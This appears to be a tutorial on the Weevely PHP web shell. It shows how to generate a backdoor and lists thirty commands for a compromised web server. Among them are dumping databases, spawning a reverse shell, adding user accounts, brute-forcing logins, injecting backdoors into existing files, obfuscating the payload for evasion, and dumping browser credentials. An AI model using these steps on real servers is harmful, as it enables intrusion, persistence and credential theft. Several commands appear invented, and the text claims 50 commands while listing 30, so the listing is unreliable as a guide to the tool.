## What is Weevely?
Weevely is a web shell that enables remote administration of web servers. Its lightweight design and simple deployment make it an excellent choice for penetration testers aiming to maintain access to a compromised system without being detected easily.
### Installation of Weevely in Kali Linux:
Before exploring the example commands, ensure that Weevely is installed on your Kali Linux system. If not, you can install it using the following command:
sudo apt-get install weevely
Once installed, you can create a Weevely backdoor using the following command:
weevely generate <password> <output.php>
Replace `<password>` with your desired password and `<output.php>` with the name of the output PHP file.
## 30 Example Commands:
1. Connect to a Weevely backdoor:
weevely http://target.com/path/to/backdoor.php <password>
2. List available modules:
weevely> show modules
3. Execute system command:
weevely> system_info
4. Upload a file:
weevely> upload localfile.txt remotefile.txt
5. Download a file:
weevely> download remotefile.txt localfile.txt
6. Run a custom PHP command:
weevely> php -c ‘echo “Hello, Weevely!”;’
7. Navigate the target file system:
weevely> cd /path/to/target/directory
8. View contents of a file:
weevely> cat filename.txt
9. Execute a command in the background:
weevely> bg system_info
10. List running background jobs:
weevely> bg -l
…
11. Search for writable directories:
weevely> search writable_dirs
12. Check if a specific module is available:
weevely> search -m admin_shell
13. Interact with a database using SQL commands:
weevely> sql -i
14. Dump the contents of a MySQL database:
weevely> sql -d targetdb -t table_name –dump
15. Spawn a reverse shell:
weevely> shell -t
16. Modify file permissions:
weevely> chmod 755 filename.php
17. List active processes:
weevely> ps
18. Create a new user account:
weevely> useradd newuser newpassword
19. Edit a file using the built-in text editor:
weevely> edit filename.txt
20. Search for sensitive files:
weevely> search sensitive_files
21. Bruteforce a login page with a given wordlist:
weevely> bruteforce http://target.com/login.php -w wordlist.txt
22. Inject a PHP backdoor into an existing PHP file:
weevely> backdoor inject /path/to/target/file.php
23. Perform a port scan on the target:
weevely> portscan -r target.com
24. Execute a command on multiple targets concurrently:
weevely> cluster_exec -c ‘uname -a’ targets.txt
25. Check if the target is vulnerable to specific exploits:
weevely> vuln_check -t target.com
26. Obfuscate Weevely payload for evasion:
weevely> obfuscate payload.php -o obfuscated_payload.php
27. Capture screenshots of target websites:
weevely> screenshot -u http://target.com
28. Execute a command on a target periodically:
weevely> cronjob_add -c ‘echo “Job executed”‘ -t 10m
29. Intercept and modify HTTP requests and responses:
weevely> http_interceptor
30. Dump credentials stored in browsers:
weevely> browser_creds_dump
## Conclusion:
Weevely is a versatile tool that empowers security professionals to remotely manage and control web servers during penetration testing. The 50 example commands provided in this article offer a glimpse into the extensive capabilities of Weevely within the Kali Linux environment. It is crucial to use such tools responsibly and only in environments where you have explicit permission to conduct security assessments. As the field of cybersecurity evolves, tools like Weevely remain essential for staying ahead of potential threats and vulnerabilities.